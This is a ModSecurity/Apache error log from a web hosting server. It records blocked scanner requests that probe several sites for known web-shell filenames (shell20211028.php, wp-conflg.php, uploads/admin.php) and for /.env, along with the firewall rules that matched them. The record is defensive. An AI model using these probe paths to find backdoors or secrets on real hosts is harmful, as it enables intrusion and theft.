[Tue May 26 18:06:23.846380 2026] [security2:error] [pid 960743:tid 960905] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/txets.php"] [unique_id "ahWTx_QvEln_BHBy2zKAdwAApVM"]
[Tue May 26 18:06:24.039354 2026] [security2:error] [pid 960743:tid 960831] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/shell20211028.php"] [unique_id "ahWTyPQvEln_BHBy2zKAggAA2lc"]
[Tue May 26 18:06:24.039610 2026] [security2:error] [pid 960743:tid 960958] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/shell20211028.php"] [unique_id "ahWTyPQvEln_BHBy2zKAggAA2lc"]
[Tue May 26 18:06:24.041192 2026] [security2:error] [pid 960743:tid 960964] [client 185.192.70.84:50415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/js/wp-conflg.php"] [unique_id "ahWTyPQvEln_BHBy2zKAgwAAAOA"]
[Tue May 26 18:06:24.293120 2026] [security2:error] [pid 960743:tid 960835] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-wz.php"] [unique_id "ahWTyPQvEln_BHBy2zKAjAAAxls"]
[Tue May 26 18:06:24.293390 2026] [security2:error] [pid 960743:tid 960938] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-wz.php"] [unique_id "ahWTyPQvEln_BHBy2zKAjAAAxls"]
[Tue May 26 18:06:24.499613 2026] [security2:error] [pid 960743:tid 960758] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/albin.php"] [unique_id "ahWTyPQvEln_BHBy2zKAmwAA3A4"]
[Tue May 26 18:06:24.499844 2026] [security2:error] [pid 960743:tid 960960] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/albin.php"] [unique_id "ahWTyPQvEln_BHBy2zKAmwAA3A4"]
[Tue May 26 18:06:24.688228 2026] [security2:error] [pid 960743:tid 960767] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/ok.php"] [unique_id "ahWTyPQvEln_BHBy2zKAoQAAoBc"]
[Tue May 26 18:06:24.688425 2026] [security2:error] [pid 960743:tid 960900] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/ok.php"] [unique_id "ahWTyPQvEln_BHBy2zKAoQAAoBc"]
[Tue May 26 18:06:24.889016 2026] [security2:error] [pid 960743:tid 960978] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTyPQvEln_BHBy2zKAlAAAAO4"]
[Tue May 26 18:06:25.082338 2026] [security2:error] [pid 960743:tid 960917] [client 85.11.167.19:57404] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahWTyfQvEln_BHBy2zKArwAAALE"]
[Tue May 26 18:06:25.309999 2026] [security2:error] [pid 960743:tid 960841] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/drykl.php"] [unique_id "ahWTyfQvEln_BHBy2zKAuAAAi2E"]
[Tue May 26 18:06:25.310172 2026] [security2:error] [pid 960743:tid 960879] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/drykl.php"] [unique_id "ahWTyfQvEln_BHBy2zKAuAAAi2E"]
[Tue May 26 18:06:25.531168 2026] [security2:error] [pid 960743:tid 960761] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/atomlib.php"] [unique_id "ahWTyfQvEln_BHBy2zKAwAAAmRE"]
[Tue May 26 18:06:25.531395 2026] [security2:error] [pid 960743:tid 960893] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/atomlib.php"] [unique_id "ahWTyfQvEln_BHBy2zKAwAAAmRE"]
[Tue May 26 18:06:25.719469 2026] [security2:error] [pid 960743:tid 960763] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/z.php"] [unique_id "ahWTyfQvEln_BHBy2zKAxQAAlBM"]
[Tue May 26 18:06:25.719779 2026] [security2:error] [pid 960743:tid 960888] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/z.php"] [unique_id "ahWTyfQvEln_BHBy2zKAxQAAlBM"]
[Tue May 26 18:06:25.754681 2026] [security2:error] [pid 960743:tid 960995] [client 66.228.62.150:52389] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahWTyPQvEln_BHBy2zKAoAAAAP8"]
[Tue May 26 18:06:25.950450 2026] [security2:error] [pid 960743:tid 960771] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-png.php"] [unique_id "ahWTyfQvEln_BHBy2zKAzAAAshs"]
[Tue May 26 18:06:25.950641 2026] [security2:error] [pid 960743:tid 960918] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-png.php"] [unique_id "ahWTyfQvEln_BHBy2zKAzAAAshs"]
[Tue May 26 18:06:26.088925 2026] [security2:error] [pid 960743:tid 960974] [client 85.11.167.19:57406] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "sevenstar.onesoft.in"] [uri "/"] [unique_id "ahWTyvQvEln_BHBy2zKAzgAAAOo"]
[Tue May 26 18:06:26.310011 2026] [security2:error] [pid 960743:tid 960769] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahWTyvQvEln_BHBy2zKA0AAApxk"]
[Tue May 26 18:06:26.310228 2026] [security2:error] [pid 960743:tid 960907] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahWTyvQvEln_BHBy2zKA0AAApxk"]
[Tue May 26 18:06:26.815118 2026] [security2:error] [pid 960743:tid 960770] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-admin/maint/wp-is.php"] [unique_id "ahWTyvQvEln_BHBy2zKA5AAAwBo"]
[Tue May 26 18:06:26.815311 2026] [security2:error] [pid 960743:tid 960932] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-admin/maint/wp-is.php"] [unique_id "ahWTyvQvEln_BHBy2zKA5AAAwBo"]
[Tue May 26 18:06:26.872307 2026] [autoindex:error] [pid 960743:tid 960972] [client 175.27.163.171:50380] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:06:27.146821 2026] [security2:error] [pid 960743:tid 960843] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/sadcut1.php"] [unique_id "ahWTy_QvEln_BHBy2zKA9QAAj2M"]
[Tue May 26 18:06:27.147094 2026] [security2:error] [pid 960743:tid 960883] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/sadcut1.php"] [unique_id "ahWTy_QvEln_BHBy2zKA9QAAj2M"]
[Tue May 26 18:06:27.248950 2026] [security2:error] [pid 960743:tid 960926] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTyvQvEln_BHBy2zKA5gAAALo"]
[Tue May 26 18:06:27.331300 2026] [security2:error] [pid 960743:tid 960921] [client 185.192.70.74:21081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/assets/husky301.php"] [unique_id "ahWTy_QvEln_BHBy2zKA-gAAALU"]
[Tue May 26 18:06:27.337497 2026] [security2:error] [pid 960743:tid 960764] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp.php"] [unique_id "ahWTy_QvEln_BHBy2zKA-wAAqBQ"]
[Tue May 26 18:06:27.337690 2026] [security2:error] [pid 960743:tid 960908] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp.php"] [unique_id "ahWTy_QvEln_BHBy2zKA-wAAqBQ"]
[Tue May 26 18:06:27.559658 2026] [security2:error] [pid 960743:tid 960842] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/x.php"] [unique_id "ahWTy_QvEln_BHBy2zKA_QAAiWI"]
[Tue May 26 18:06:27.559909 2026] [security2:error] [pid 960743:tid 960877] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/x.php"] [unique_id "ahWTy_QvEln_BHBy2zKA_QAAiWI"]
[Tue May 26 18:06:27.761377 2026] [security2:error] [pid 960743:tid 960773] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-conflg.php"] [unique_id "ahWTy_QvEln_BHBy2zKBBwAArh0"]
[Tue May 26 18:06:27.761599 2026] [security2:error] [pid 960743:tid 960914] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-conflg.php"] [unique_id "ahWTy_QvEln_BHBy2zKBBwAArh0"]
[Tue May 26 18:06:27.950258 2026] [security2:error] [pid 960743:tid 960772] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-update.php"] [unique_id "ahWTy_QvEln_BHBy2zKBCgAAxhw"]
[Tue May 26 18:06:27.950484 2026] [security2:error] [pid 960743:tid 960938] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-update.php"] [unique_id "ahWTy_QvEln_BHBy2zKBCgAAxhw"]
[Tue May 26 18:06:28.139485 2026] [security2:error] [pid 960743:tid 960766] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/hello.php"] [unique_id "ahWTzPQvEln_BHBy2zKBEQAAvBY"]
[Tue May 26 18:06:28.139688 2026] [security2:error] [pid 960743:tid 960928] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/hello.php"] [unique_id "ahWTzPQvEln_BHBy2zKBEQAAvBY"]
[Tue May 26 18:06:28.327569 2026] [security2:error] [pid 960743:tid 960774] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/NewFile.php"] [unique_id "ahWTzPQvEln_BHBy2zKBEwAA6R4"]
[Tue May 26 18:06:28.327734 2026] [security2:error] [pid 960743:tid 960973] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/NewFile.php"] [unique_id "ahWTzPQvEln_BHBy2zKBEwAA6R4"]
[Tue May 26 18:06:28.724069 2026] [security2:error] [pid 960743:tid 960959] [client 185.192.70.96:60257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp.php"] [unique_id "ahWTzPQvEln_BHBy2zKBHAAAANs"]
[Tue May 26 18:06:28.827695 2026] [security2:error] [pid 960743:tid 960791] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/bless5.php"] [unique_id "ahWTzPQvEln_BHBy2zKBHQAAli8"]
[Tue May 26 18:06:28.827892 2026] [security2:error] [pid 960743:tid 960890] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/bless5.php"] [unique_id "ahWTzPQvEln_BHBy2zKBHQAAli8"]
[Tue May 26 18:06:29.016515 2026] [security2:error] [pid 960743:tid 960777] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/v2.php"] [unique_id "ahWTzfQvEln_BHBy2zKBJQAA7yE"]
[Tue May 26 18:06:29.016737 2026] [security2:error] [pid 960743:tid 960979] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/v2.php"] [unique_id "ahWTzfQvEln_BHBy2zKBJQAA7yE"]
[Tue May 26 18:06:29.205749 2026] [security2:error] [pid 960743:tid 960786] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp4.php"] [unique_id "ahWTzfQvEln_BHBy2zKBLQAA7Co"]
[Tue May 26 18:06:29.205934 2026] [security2:error] [pid 960743:tid 960976] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp4.php"] [unique_id "ahWTzfQvEln_BHBy2zKBLQAA7Co"]
[Tue May 26 18:06:29.560421 2026] [security2:error] [pid 960743:tid 960789] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/bless11.php"] [unique_id "ahWTzfQvEln_BHBy2zKBOQAA1S0"]
[Tue May 26 18:06:29.560620 2026] [security2:error] [pid 960743:tid 960953] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/bless11.php"] [unique_id "ahWTzfQvEln_BHBy2zKBOQAA1S0"]
[Tue May 26 18:06:29.809263 2026] [security2:error] [pid 960743:tid 960792] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/fileas.php"] [unique_id "ahWTzfQvEln_BHBy2zKBQAAAnjA"]
[Tue May 26 18:06:29.809449 2026] [security2:error] [pid 960743:tid 960898] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/fileas.php"] [unique_id "ahWTzfQvEln_BHBy2zKBQAAAnjA"]
[Tue May 26 18:06:29.999649 2026] [security2:error] [pid 960743:tid 960790] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-aothait.php"] [unique_id "ahWTzfQvEln_BHBy2zKBSgAA8y4"]
[Tue May 26 18:06:29.999865 2026] [security2:error] [pid 960743:tid 960983] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-aothait.php"] [unique_id "ahWTzfQvEln_BHBy2zKBSgAA8y4"]
[Tue May 26 18:06:30.099430 2026] [security2:error] [pid 960743:tid 960888] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTzfQvEln_BHBy2zKBPAAAAJQ"]
[Tue May 26 18:06:30.353465 2026] [security2:error] [pid 960743:tid 960886] [client 185.192.70.100:55149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/wp-trackback.php"] [unique_id "ahWTzvQvEln_BHBy2zKBWwAAAJI"]
[Tue May 26 18:06:30.661182 2026] [security2:error] [pid 960743:tid 960802] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/motu.php"] [unique_id "ahWTzvQvEln_BHBy2zKBXwAAlTo"]
[Tue May 26 18:06:30.661488 2026] [security2:error] [pid 960743:tid 960889] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/motu.php"] [unique_id "ahWTzvQvEln_BHBy2zKBXwAAlTo"]
[Tue May 26 18:06:30.850900 2026] [security2:error] [pid 960743:tid 960783] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/fff.php"] [unique_id "ahWTzvQvEln_BHBy2zKBaQAA7Cc"]
[Tue May 26 18:06:30.851123 2026] [security2:error] [pid 960743:tid 960976] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/fff.php"] [unique_id "ahWTzvQvEln_BHBy2zKBaQAA7Cc"]
[Tue May 26 18:06:31.110037 2026] [security2:error] [pid 960743:tid 960803] [remote 20.206.111.149:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp5.php"] [unique_id "ahWTz_QvEln_BHBy2zKBcgAAqDs"]
[Tue May 26 18:06:31.110246 2026] [security2:error] [pid 960743:tid 960908] [client 20.206.111.149:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp5.php"] [unique_id "ahWTz_QvEln_BHBy2zKBcgAAqDs"]
